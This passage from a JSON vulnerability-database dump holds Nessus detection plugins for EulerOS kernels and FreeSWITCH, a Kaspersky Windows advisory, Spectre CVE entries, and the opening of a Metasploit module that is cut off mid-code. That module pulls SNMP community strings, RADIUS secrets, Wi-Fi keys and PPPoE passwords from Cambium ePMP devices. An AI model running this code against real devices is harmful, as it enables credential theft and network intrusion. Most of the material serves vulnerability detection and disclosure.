DCC session in which incorrect\n packet data is transmitted during use of the NAT mangle\n feature.(CVE-2014-1690)\n\n - It was found that the Linux kernel's keys subsystem did\n not correctly garbage collect uninstantiated keyrings.\n A local attacker could use this flaw to crash the\n system or, potentially, escalate their privileges on\n the system.(CVE-2015-7872)\n\n - The TCP stack in the Linux kernel 3.x does not properly\n implement a SYN cookie protection mechanism for the\n case of a fast network connection, which allows remote\n attackers to cause a denial of service (CPU\n consumption) by sending many TCP SYN packets, as\n demonstrated by an attack against the kernel-3.10.0\n package in CentOS Linux 7. NOTE: third parties have\n been unable to discern any relationship between the\n GitHub Engineering finding and the Trigemini.c attack\n code.(CVE-2017-5972)\n\n - The xfrm_migrate() function in the\n net/xfrm/xfrm_policy.c file in the Linux kernel built\n with CONFIG_XFRM_MIGRATE does not verify if the dir\n parameter is less than XFRM_POLICY_MAX. This allows a\n local attacker to cause a denial of service\n (out-of-bounds access) or possibly have unspecified\n other impact by sending a XFRM_MSG_MIGRATE netlink\n message. This flaw is present in the Linux kernel since\n an introduction of XFRM_MSG_MIGRATE in 2.6.21-rc1, up\n to 4.13-rc3.(CVE-2017-11600)\n\n - A use-after-free flaw was found in the Linux kernel\n which enables a race condition in the L2TPv3 IP\n Encapsulation feature. A local user could use this flaw\n to escalate their privileges or crash the\n system.(CVE-2016-10200)\n\n - A flaw was found in the way the Linux kernel's VFS\n subsystem handled file system locks. A local,\n unprivileged user could use this flaw to trigger a\n deadlock in the kernel, causing a denial of service on\n the system.(CVE-2014-8559)\n\n - Multiple buffer overflows in\n drivers/staging/wlags49_h2/wl_priv.c in the Linux\n kernel before 3.12 allow local users to cause a denial\n of service or possibly have unspecified other impact by\n leveraging the CAP_NET_ADMIN capability and providing a\n long station-name string, related to the (1)\n wvlan_uil_put_info and (2) wvlan_set_station_nickname\n functions.(CVE-2013-4514)\n\n - The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c at the Linux kernel\n version 3.4 and up to and including 4.15 has an\n integer-overflow vulnerability allowing local users\n with access to the udldrmfb driver to obtain full read\n and write permissions on kernel physical pages,\n resulting in a code execution in kernel\n space.(CVE-2018-8781)\n\n - A flaw was discovered in the Linux kernel where issuing\n certain ioctl() -s commands to the '/dev/ppp' device\n file could lead to a NULL pointer dereference. A\n privileged user could use this flaw to cause a kernel\n crash and denial of service.(CVE-2015-7799)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ca0c9141\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:40:11", "bulletinFamily": "scanner", "description": "The remote FreeSWITCH server is prior to version 1.4.26 or 1.6.x prior\nto 1.6.5. It is, therefore, affected by a remote code execution\nvulnerability due to improper validation of user-supplied input to the\nparse_string() function in esl_json.c, switch_json.c, and ks_json.c. A\nremote attacker can exploit this, via a crafted JSON message, to cause\na heap-based buffer overflow condition, resulting in a denial of\nservice or the execution of arbitrary code.", "modified": "2019-11-02T00:00:00", "id": "FREESWITCH_FS8160.NASL", "href": "https://www.tenable.com/plugins/nessus/88696", "published": "2016-02-11T00:00:00", "title": "FreeSWITCH < 1.4.26 / 1.6.x < 1.6.5 JSON Parser RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88696);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2015-7392\", \"CVE-2015-8311\");\n script_bugtraq_id(76976);\n script_xref(name:\"TRA\", value:\"TRA-2015-05\");\n\n script_name(english:\"FreeSWITCH < 1.4.26 / 1.6.x < 1.6.5 JSON Parser RCE\");\n script_summary(english:\"Checks the version of FreeSWITCH.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeSWITCH server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FreeSWITCH server is prior to version 1.4.26 or 1.6.x prior\nto 1.6.5. It is, therefore, affected by a remote code execution\nvulnerability due to improper validation of user-supplied input to the\nparse_string() function in esl_json.c, switch_json.c, and ks_json.c. A\nremote attacker can exploit this, via a crafted JSON message, to cause\na heap-based buffer overflow condition, resulting in a denial of\nservice or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://freeswitch.org/jira/browse/FS-8160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2015-05\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FreeSWITCH version 1.4.26 / 1.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:freeswitch:freeswitch\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"freeswitch_detection.nbin\");\n script_require_keys(\"Settings/ParanoidReport\", \"sip/freeswitch/present\");\n script_require_ports(\"Services/udp/sip\", \"Services/sip\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"FreeSWITCH\";\nget_kb_item_or_exit(\"sip/freeswitch/present\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nerrors = make_list();\nudp_ports = get_kb_list(\"Services/udp/sip\");\ntcp_ports = get_kb_list(\"Services/sip\");\nif (isnull(tcp_ports) && isnull(udp_ports)) audit(AUDIT_NOT_INST, appname);\n\nfunction is_vulnerable(version, commit, proto, port)\n{\n local_var report = '';\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to determine the FreeSWITCH version on \" + proto + \"/\" + port + \".\");\n return FALSE;\n }\n\n # the fix was pushed out in 1.6.5\n if (ver_compare(ver:version, fix:\"1.6.5\", strict:FALSE) < 0)\n {\n # freeswitch now maintains a 1.6 branch and a 1.4 branch. Determine\n # if we are looking at a 1.4 line\n if (ver_compare(ver:version, fix:\"1.5\", strict:FALSE) < 0)\n {\n if (ver_compare(ver:version, fix:\"1.4.26\", strict:FALSE) < 0)\n {\n report = \n '\\n Installed version : ' + version + \n '\\n Fixed version : 1.4.26\\n';\n }\n }\n else\n {\n report = \n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.6.5\\n';\n }\n }\n\n if (report != '')\n {\n if (report_verbosity > 0) security_hole(extra:report, port:port, proto:proto);\n else security_hole(port:port, proto:proto);\n return TRUE;\n }\n return FALSE;\n}\n\nis_vuln = FALSE;\nif (!isnull(tcp_ports))\n{\n foreach port (make_list(tcp_ports))\n {\n version = get_kb_item(\"sip/freeswitch/tcp/\" + port + \"/version\");\n if (!version) continue;\n if (!isnull(version) && is_vulnerable(version:version, proto:\"tcp\", port:port)) is_vuln = TRUE;\n }\n}\nif (!isnull(udp_ports))\n{\n foreach port (make_list(udp_ports))\n {\n version = get_kb_item(\"sip/freeswitch/udp/\" + port + \"/version\");\n if (!version) continue;\n if (!isnull(version) && is_vulnerable(version:version, proto:\"udp\", port:port)) is_vuln = TRUE;\n }\n}\n\nif (max_index(errors))\n{\n errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n exit(1, errmsg);\n} else if(!is_vuln) audit(AUDIT_INST_VER_NOT_VULN, appname);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:08", "bulletinFamily": "info", "description": "### *Detect date*:\n09/11/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities were found in PRODUCT. Malicious users can exploit these vulnerabilities to obtain sensitive information, gain privileges, cause denial of service, execute arbitrary code, bypass security restrictions.\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1709 for 64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nWindows Server, version 1803 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8336](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8336>) \n[CVE-2018-8433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8433>) \n[CVE-2018-8462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8462>) \n[CVE-2018-8442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8442>) \n[CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>) \n[CVE-2018-8438](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8438>) \n[CVE-2018-8455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8455>) \n[CVE-2018-8392](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8392>) \n[CVE-2018-8410](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8410>) \n[CVE-2018-8335](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8335>) \n[CVE-2018-8444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8444>) \n[CVE-2018-8441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8441>) \n[CVE-2018-8332](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8332>) \n[CVE-2018-0965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0965>) \n[CVE-2018-8422](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8422>) \n[CVE-2018-8271](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8271>) \n[CVE-2018-8437](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8437>) \n[CVE-2018-8443](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8443>) \n[CVE-2018-8475](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8475>) \n[CVE-2018-8419](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8419>) \n[CVE-2018-8434](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8434>) \n[CVE-2018-8420](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8420>) \n[CVE-2018-8436](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8436>) \n[CVE-2018-8439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8439>) \n[CVE-2018-8449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8449>) \n[CVE-2018-8435](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8435>) \n[CVE-2018-8424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8424>) \n[CVE-2018-8468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8468>) \n[CVE-2018-8393](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8393>) \n[CVE-2018-8445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8445>) \n[CVE-2018-8337](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8337>) \n[CVE-2018-8446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8446>) \n[ADV180022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180022>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-8336](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8336>)2.5Warning \n[CVE-2018-8433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8433>)4.7Warning \n[CVE-2018-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8462>)7.0Warning \n[CVE-2018-8442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8442>)2.5Warning \n[CVE-2018-8440](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8440>)7.8Warning \n[CVE-2018-8438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8438>)5.8Warning \n[CVE-2018-8455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8455>)2.5Warning \n[CVE-2018-8392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8392>)7.8Warning \n[CVE-2018-8410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8410>)7.0Warning \n[CVE-2018-8335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8335>)4.8Warning \n[CVE-2018-8444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8444>)7.0Warning \n[CVE-2018-8441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8441>)7.0Warning \n[CVE-2018-8332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8332>)8.8Warning \n[CVE-2018-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0965>)7.6Warning \n[CVE-2018-8422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8422>)4.7Warning \n[CVE-2018-8271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8271>)2.5Warning \n[CVE-2018-8437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8437>)7.6Warning \n[CVE-2018-8443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8443>)2.5Warning \n[CVE-2018-8475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8475>)8.8Warning \n[CVE-2018-8419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8419>)2.5Warning \n[CVE-2018-8434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8434>)7.6Warning \n[CVE-2018-8420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8420>)7.5Warning \n[CVE-2018-8436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8436>)7.6Warning \n[CVE-2018-8439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8439>)7.6Warning \n[CVE-2018-8449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8449>)5.3Warning \n[CVE-2018-8435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8435>)4.2Warning \n[CVE-2018-8424](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8424>)4.7Warning \n[CVE-2018-8468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8468>)4.3Warning \n[CVE-2018-8393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8393>)7.8Warning \n[CVE-2018-8445](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8445>)2.5Warning \n[CVE-2018-8337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8337>)5.3Warning \n[CVE-2018-8446](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8446>)2.5Warning\n\n### *KB list*:\n[4457984](<http://support.microsoft.com/kb/4457984>) \n[4458010](<http://support.microsoft.com/kb/4458010>) \n[4457128](<http://support.microsoft.com/kb/4457128>) \n[4457131](<http://support.microsoft.com/kb/4457131>) \n[4457132](<http://support.microsoft.com/kb/4457132>) \n[4457142](<http://support.microsoft.com/kb/4457142>) \n[4457138](<http://support.microsoft.com/kb/4457138>) \n[4457129](<http://support.microsoft.com/kb/4457129>) \n[4457143](<http://support.microsoft.com/kb/4457143>) \n[4457144](<http://support.microsoft.com/kb/4457144>) \n[4457145](<http://support.microsoft.com/kb/4457145>) \n[4457135](<http://support.microsoft.com/kb/4457135>) \n[4457140](<http://support.microsoft.com/kb/4457140>)\n\n### *Microsoft official advisories*:", "modified": "2019-03-07T00:00:00", "published": "2018-09-11T00:00:00", "id": "KLA11316", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11316", "title": "\r KLA11316Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2019-10-16T17:30:09", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.", "modified": "2019-05-23T15:29:00", "id": "CVE-2018-3639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3639", "published": "2018-05-22T12:29:00", "title": "CVE-2018-3639", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-10-10T12:22:17", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.", "modified": "2019-04-23T19:30:00", "id": "CVE-2017-5753", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5753", "published": "2018-01-04T13:29:00", "title": "CVE-2017-5753", "type": "cve", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-11-02T08:17:25", "bulletinFamily": "exploit", "description": "Cambium devices (ePMP, PMP, Force, & others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested on Cambium ePMP versions 3.5 & prior.\n", "modified": "2019-08-15T23:10:44", "published": "2017-12-18T22:32:55", "id": "MSF:AUXILIARY/SCANNER/SNMP/EPMP1000_SNMP_LOOT", "href": "", "type": "metasploit", "title": "Cambium ePMP 1000 SNMP Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Cambium ePMP 1000 SNMP Enumeration',\n 'Description' => %{\n Cambium devices (ePMP, PMP, Force, & others) can be administered using\n SNMP. The device configuration contains IP addresses, keys, and passwords,\n amongst other information. This module uses SNMP to extract Cambium ePMP device\n configuration. On certain software versions, specific device configuration\n values can be accessed using SNMP RO string, even though only SNMP RW string\n should be able to access them, according to MIB documentation. The module also\n triggers full configuration backup, and retrieves the backup url. The\n configuration file can then be downloaded without authentication. The module\n has been tested on Cambium ePMP versions 3.5 & prior.\n },\n 'References' =>\n [\n ['URL', 'https://ipositivesecurity.com/2017/04/07/cambium-snmp-security-vulnerabilities/'],\n ['CVE', '2017-7918'],\n ['CVE', '2017-7922']\n ],\n 'Author' => ['Karn Ganeshen'],\n 'License' => MSF_LICENSE\n )\n end\n\n def run_host(ip)\n begin\n snmp = connect_snmp\n\n epmp_info = ''\n\n # System Info\n snmp_systemname = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.3.0')\n snmp_systemdescription = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.4.0')\n system_uptime = snmp.get_value('1.3.6.1.4.1.17713.21.1.1.4.0')\n uboot_version = snmp.get_value('1.3.6.1.4.1.17713.21.1.1.14.0')\n\n epmp_info << \"SNMP System Name: #{snmp_systemname}\" << \"\\n\"\n epmp_info << \"SNMP System Description: #{snmp_systemdescription}\" << \"\\n\"\n epmp_info << \"Device UpTime: #{system_uptime}\" << \"\\n\"\n epmp_info << \"U-boot version: #{uboot_version}\" << \"\\n\"\n\n # SNMP Info\n snmp_readonly_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.1.0')\n snmp_readwrite_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.2.0')\n snmp_trap_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.6.0')\n snmp_trap_entryip = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.7.1.2.0')\n\n epmp_info << \"SNMP read-only community name: #{snmp_readonly_community}\" << \"\\n\"\n epmp_info << \"SNMP read-write community name: #{snmp_readwrite_community}\" << \"\\n\"\n epmp_info << \"SNMP Trap Community: #{snmp_trap_community}\" << \"\\n\"\n epmp_info << \"SNMP Trap Server IP Address: #{snmp_trap_entryip}\" << \"\\n\"\n\n # WIFI Radius Info\n wireless_radius_serverinfo = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.5.0')\n wireless_radius_serverport = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.6.1.1.3.0')\n wireless_radius_serversecret = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.6.1.1.4.0')\n wireless_radius_username = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.8.0')\n wireless_radius_password = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.9.0')\n\n epmp_info << \"RADIUS server info: #{wireless_radius_serverinfo}\" << \"\\n\"\n epmp_info << \"RADIUS server port: #{wireless_radius_serverport}\" << \"\\n\"\n epmp_info << \"RADIUS server secret: #{wireless_radius_serversecret}\" << \"\\n\"\n epmp_info << \"Wireless Radius Username: #{wireless_radius_username}\" << \"\\n\"\n epmp_info << \"Wireless Radius Password: #{wireless_radius_password}\" << \"\\n\"\n\n # WIFI Info\n wireless_interface_ssid = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.2.0')\n wireless_interface_encryptionkey = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.4.0')\n wireless_interface_encryption = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.3.0')\n\n epmp_info << \"Wireless Interface SSID: #{wireless_interface_ssid}\" << \"\\n\"\n epmp_info << \"Wireless Interface Encryption Key: #{wireless_interface_encryptionkey}\" << \"\\n\"\n epmp_info << \"Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wireless_interface_encryption}\" << \"\\n\"\n\n # Network PPPoE config\n network_wan_pppoeservice = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.13.0')\n network_wan_pppoeusername = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.10.0')\n network_wan_pppoepassword = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.11.0')\n\n epmp_info << \"Network PPPoE Service Name: #{network_wan_pppoeservice}\" << \"\\n\"\n epmp_info << \"Network PPPoE Username: #{network_wan_pppoeusername}\" << \"\\n\"\n epmp_info << \"Network PPPoE Password: #{network_wan_pppoepassword}\" << \"\\n\"\n\n # Printing captured info\n print_status(\"Fetching System Information...\\n\")\n 